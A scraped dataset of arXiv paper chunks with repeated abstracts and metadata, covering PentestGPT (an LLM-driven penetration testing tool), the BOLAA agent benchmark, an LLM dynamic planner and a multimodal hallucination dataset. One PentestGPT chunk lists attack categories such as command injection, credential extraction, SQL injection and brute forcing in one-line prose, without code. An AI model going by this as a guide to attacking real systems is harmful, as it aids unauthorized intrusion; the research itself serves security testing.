practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 86 | Inject arbitrary commands to be run on a host machine, often leading to unauthorized system control. Manipulate user access controls to escalate privileges or gain unauthorized access to resources. Locate and extract authentication credentials such as usernames and passwords within the system. Exploit vulnerabilities in FTP (File Transfer Protocol) services to gain unauthorized access, file manipulation, or data extraction. Analyze and manipulate scheduled tasks (cron jobs) to execute unauthorized commands or disrupt normal operations. Exploit SQL (Structured Query Language) vulnerabilities like SQL injection to manipulate databases and extract sensitive information. Target Windows-based networks to exploit domain-level vulnerabilities, often gaining widespread unauthorized access. Exploit insecure deserialization processes to execute arbitrary code or manipulate object data. Repeatedly try different authentication credentials to gain unauthorized access to systems or data. Inject malicious scripts into web pages viewed by others, allowing for unauthorized access or data theft. Utilize or create exploits targeting PHP applications, leading to unauthorized access or code execution. Create and utilize custom-crafted passwords based on gathered information, aiding in | 2308.06782#86 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 87 | exploits targeting PHP applications, leading to unauthorized access or code execution. Create and utilize custom-crafted passwords based on gathered information, aiding in unauthorized access attempts. Exploit vulnerabilities in XML parsers to perform unauthorized reading of data, denial of service, or execute remote requests. Target SSH (Secure Shell) services to gain unauthorized access or command execution on remote systems. Research known vulnerabilities in the Common Vulnerabilities and Exposures (CVE) database to understand and potentially exploit weaknesses in target systems. Other engagements in additional exploratory testing and other methods to uncover vulnerabilities not identified by standard procedures. | 2308.06782#87 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.05960 | 0 | 3 2 0 2
g u A 1 1 ] I A . s c [
1 v 0 6 9 5 0 . 8 0 3 2 : v i X r a
PREPRINT
# BOLAA: BENCHMARKING AND ORCHESTRATING LLM-AUGMENTED AUTONOMOUS AGENTS
Zhiwei Liuâ â, Weiran Yaoâ , Jianguo Zhangâ , Le Xueâ , Shelby Heineckeâ , Rithesh Murthyâ , Yihao Fengâ , Zeyuan Chenâ , Juan Carlos Nieblesâ , Devansh Arpitâ , Ran Xuâ , Phil Muiâ, Huan Wangâ â¦, Caiming Xiongâ â¦, Silvio Savareseâ â¦
# â Salesforce Research, USA âCTO Office, Salesforce, USA â¦Corresponding Authors: {huan.wang, cxiong, ssavarese}@salesforce.com
# ABSTRACT | 2308.05960#0 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 0 | 3 2 0 2
g u A 1 1 ] L C . s c [
1 v 1 9 3 6 0 . 8 0 3 2 : v i X r a
# Dynamic Planning with a LLM
# Frank Keller School of Informatics University of Edinburgh, UK [email protected], {keller, alex}@inf.ed.ac.uk
# Abstract
While Large Language Models (LLMs) can solve many NLP tasks in zero-shot settings, ap- plications involving embodied agents remain problematic. In particular, complex plans that require multi-step reasoning become difficult and too costly as the context window grows. Planning requires understanding the likely ef- fects of oneâs actions and identifying whether the current environment satisfies the goal state. While symbolic planners find optimal solu- tions quickly, they require a complete and ac- curate representation of the planning problem, severely limiting their use in practical scenarios. In contrast, modern LLMs cope with noisy ob- servations and high levels of uncertainty when reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a neuro- symbolic framework where an LLM works hand-in-hand with a traditional planner to solve an embodied task. Given action-descriptions, LLM-DP solves Alfworld faster and more effi- ciently than a naive LLM ReAct baseline.
1
# 1 Introduction | 2308.06391#0 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.05960 | 1 | # ABSTRACT
The massive successes of large language models (LLMs) encourage the emerging exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to generate actions with its core LLM and interact with environments, which fa- cilitates the ability to resolve complex tasks by conditioning on past interactions such as observations and actions. Since the investigation of LAA is still very re- cent, limited explorations are available. Therefore, we provide a comprehensive comparison of LAA in terms of both agent architectures and LLM backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs such that each labor LAA focuses on one type of action, i.e. BOLAA, where a controller manages the communication among multiple agents. We conduct simulations on both decision-making and multi-step reasoning environments, which comprehen- sively justify the capacity of LAAs. Our performance results provide quantitative suggestions for designing LAA architectures and the optimal choice of LLMs, as well as the compatibility of both. We release our implementation code of LAAs to the public at https://github.com/salesforce/BOLAA.
# INTRODUCTION | 2308.05960#1 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 1 | 1
# 1 Introduction
Consistency (Wang et al., 2023b) augment the con- text with reasoning traces. Other, agent-based ap- proaches, such as ReAct (Yao et al., 2023), inte- grate feedback from the environment iteratively, giving the agent the ability to take âthinkingâ steps or to augment its context with a reasoning trace. However, these approaches frequently involve high computational costs due to the iterated invocations of LLMs and still face challenges dealing with the limits of the context window and recovering from hallucinations, which can compromise the quality of the plans.
Conversely, traditional symbolic planners, such as the Fast-Forward planner (Hoffmann and Nebel, 2001) or the BFS(f) planner(Lipovetzky et al., 2014), excel at finding optimal plans efficiently. But symbolic planners require problem and domain descriptions as prerequisites (McDermott, 2000), which hampers their applicability in real-world sce- narios where it may be infeasible to achieve these high informational demands. For instance, know- ing a complete and accurate description of the goal may not be possible before exploring the environ- ment through actions. | 2308.06391#1 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 1 | Instruction tuned Large Vision Language Models (LVLMs) have significantly advanced in generalizing across a diverse set of multi-modal tasks, especially for Visual Question Answer- ing (VQA). However, generating detailed responses that are visually grounded is still a challenging task for these models. We find that even the current state-of-the-art LVLMs (Instruct- BLIP) still contain a staggering 30 percent of the hallucinatory text in the form of non-existent objects, unfaithful descriptions, and inaccurate relationships. To address this, we introduce M- HalDetect1, a Multimodal Hallucination Detection Dataset that can be used to train and benchmark models for halluci- nation detection and prevention. M-HalDetect consists of 16k fine-grained annotations on VQA examples, making it the first comprehensive multi-modal hallucination detection dataset for detailed image descriptions. Unlike previous work that only consider object hallucination, we additionally annotate both entity descriptions and relationships that are unfaithful. To demonstrate the potential of this dataset for hallucination prevention, we optimize InstructBLIP through our novel Fine- grained Direct Preference Optimization | 2308.06394#1 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
2308.05960 | 2 | # INTRODUCTION
Recent booming successes of large language models (LLMs) (OpenAI, 2023; Touvron et al., 2023) motivate emerging exploration of employing LLM to tackle various complex tasks (Zhang et al., 2023), amongst which LLM-augmented Autonomous Agents (LAAs) (Shinn et al., 2023; Madaan et al., 2023b; Huang et al., 2022; Kim et al., 2023; Paul et al., 2023; Yao et al., 2023a) stand with most spotlights. LAA extends the intelligence of LLM to sequential action executions, exhibiting su- periority in interacting with environments and resolving complex tasks via collecting observations. To name a few, BabyAGI1 proposes an AI-powered task management system, which leverages Ope- nAI LLM2 to create, prioritize, and execute tasks. AutoGPT3 is another popular open-source LAA framework that enables the API calling capability of LLMs. ReAct (Yao et al., 2023a) is a recently proposed LAA method to interact with environments then consecutively generate the next action. Langchain4 is a recently released open-source framework for developing LAA. | 2308.05960#2 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 2 | Large Language Models (LLMs), like GPT-4 (Ope- nAI, 2023), have proven remarkably effective at various natural language processing tasks, partic- ularly in zero-shot or few-shot settings (Brown et al., 2020). However, employing LLMs in em- bodied agents, which interact with dynamic envi- ronments, presents substantial challenges. LLMs tend to generate incorrect or spurious information, a phenomenon known as hallucination, and their performance is brittle to the phrasing of prompts (Ji et al., 2022). Moreover, LLMs are ill-equipped for naive long-term planning since managing an extensive context over multiple steps is complex and resource-consuming (Silver et al., 2022; Liu et al., 2023). | 2308.06391#2 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 2 | To demonstrate the potential of this dataset for hallucination prevention, we optimize InstructBLIP through our novel Fine- grained Direct Preference Optimization (FDPO). We also train fine-grained multi-modal reward models from InstructBLIP and evaluate their effectiveness with best-of-n rejection sam- pling. We perform human evaluation on both FDPO and rejec- tion sampling, and find that they reduce hallucination rates in InstructBLIP by 41% and 55% respectively. We also find that our reward model generalizes to other multi-modal models, reducing hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has strong correlation with human evaluated accuracy scores. | 2308.06394#2 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
2308.05960 | 3 | Due to the initial investigation, LAA is rather under-explored. Firstly, the optimal agent architecture is undetermined. ReAct (Yao et al., 2023a) prompts the agents with pre-defined examples such that the LLM learns to generate the next action via in-context learning. Moreover, ReAct argues that an agent should have intermediate reasoning steps before action executions. ReWOO (Xu et al., 2023) introduces additional planning steps for LAA. Langchain generalizes the ReAct agent with
â[email protected] 1https://github.com/yoheinakajima/babyagi 2https://platform.openai.com/docs/api-reference 3https://github.com/Significant-Gravitas/Auto-GPT 4https://github.com/langchain-ai/langchain
1
PREPRINT
zero-shot tool usage ability. Intrinsically, the optimal architecture of agents should be aligned with both tasks and the associated LLM backbone, which is less explored in the existing works. | 2308.05960#3 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 3 | Various approaches have aimed to mitigate some of these limitations. For instance, methods like Chain-of-Thought (Wei et al., 2022) and SelfPrevious work by (Liu et al., 2023) has shown that LLMs can generate valid problem files in the Planning Domain Definition Language (PDDL ) for many simple examples. Yet, the problem of incom- plete information remains: agents often need to interact with the world to discover their surround- ings before optimal planning can be applied. Some versions of PDDL have been proposed in the past to deal with probabilities or Task and Motion Plan- ning, such as PPDDL and PDDLStream (Younes and Littman, 2004; Garrett et al., 2018), but these still assume a human designer encoding the agentâs understanding of the domain and the planning prob- lem, rather than the agent learning from interac- tions. Therefore, where modern LLMs need mini- mal information to figure out a task, e.g. through Few-shot or In-Context Learning (Honovich et al., | 2308.06391#3 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 3 | Introduction Large language models (LLMs) have transformed the AI landscape in recent years, scaling their training data to tril- lions of tokens and their parameter count to hundreds of bil- lions(Brown et al. 2020; OpenAI 2023; Touvron et al. 2023). This has unlocked powerful emergent behaviors, and seen widespread adoption through the use of chat agents such as ChatGPT. Recently, advances in multi-modal models have seen adoption around grafting visual backbones onto pre- trained large language models, resulting in LVLMs(Liu et al. 2023b; Dai et al. 2023; Ye et al. 2023). While this has led to
These authors contributed equally. â Work done at ScaleAI 1Code and dataset will be publicly released
strides in overall VQA performance, it brings along the same challenges that plague these LLMs - a significant one being the propensity to generate hallucinations. | 2308.06394#3 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
